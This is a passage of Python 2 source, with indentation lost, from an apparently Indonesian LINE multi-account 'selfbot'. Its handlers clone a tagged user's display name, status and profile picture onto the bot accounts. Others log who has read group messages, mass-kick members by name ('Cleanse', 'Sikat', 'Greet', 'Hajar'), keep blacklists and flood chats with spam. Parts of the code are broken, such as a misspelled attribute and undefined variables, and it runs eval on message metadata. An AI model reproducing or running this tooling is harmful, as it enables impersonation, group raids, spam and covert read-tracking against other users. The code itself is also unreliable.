time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
print("Sp asli")
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
print("Speedbot")
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
k1.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = k1.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
k1.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = k1.getContact(target)
X = contact.displayName
profile = k1.getProfile()
profile.displayName = X
k1.updateProfile(profile)
k1.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = k1.getProfile()
lol.statusMessage = Y
k1.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
k1.updateProfilePicture(P)
except Exception as e:
k1.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = k1.getProfile()
profile.displayName = x
k1.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
k1.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
k1.updateProfilePicture(p)
k1.sendText(msg.to, "Succes")
except Exception as e:
k1.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Sider":
if msg.from_ in admin:
cl.sendText(msg.to, "CCTV sedang di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Ciduk":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : By babang adhi\n\n>Pelaku CCTV<\n%s-=CCTV=-[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Oneng")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "✔ ✰ TEAM BONDS KILLS ✰\nRead : %s\n\n✖ Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,k1]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["Join","Masuk"]: #Panggil Semua Bot
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
#kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
#k5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Balik all"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
#kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
#k5.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Pulang"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
#kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Assalammualaikum"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Halo"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagidevil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Sikat" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Sikat","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah;")
msg.contentType = 13
# msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots:
pass
if target in admin:
pass
else:
try:
klist=[cl,ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
#msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
elif "Hajar " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Hajar ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
satpam.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
